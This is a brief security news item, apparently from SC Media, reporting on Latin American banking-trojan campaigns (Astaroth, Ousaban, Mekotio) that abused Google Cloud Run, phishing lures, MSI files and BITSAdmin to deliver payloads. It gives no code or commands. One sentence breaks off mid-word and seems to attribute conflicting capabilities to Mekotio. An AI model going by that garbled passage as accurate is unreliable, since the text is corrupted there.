Cloud Security

High-volume malware campaigns involve Google Cloud Run exploitation

BleepingComputer reports that several countries across Latin America have been subjected to high-volume attacks deploying the Astaroth, Ousaban, and Mekotio banking trojans that involved the exploitation of the Google Cloud Run service since September.

Intrusions commenced with the distribution of phishing emails using financial and tax documents, as well as local government communications, as lures, which contain links to Google Cloud Run, a report from Cisco Talos showed. Attackers then use MSI files to facilitate initial payload delivery, with the BITSAdmin Windows tool later exploited to enable second-stage payload distribution. Further examination of the delivered trojans noted that more than 300 financial organizations have already been targeted by the Astaroth trojan, also known as Guildma. Aside from enabling keylogging and clipboard monitoring, Astaroth also allows the exfiltration of cryptocurrency wallet and banking credentials. On the other hand, Mekotio, which was noted to be delivered in the latter part of Astaroth attacks, allows credential phishing via fraudulent banking p Meanwhile, Mekotio permits browser manipulation in addition to banking credential and personal data theft.

An In-Depth Guide to Cloud Security

Get essential knowledge and practical strategies to fortify your cloud security.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms of Use and Privacy Policy.

You can skip this ad in 5 seconds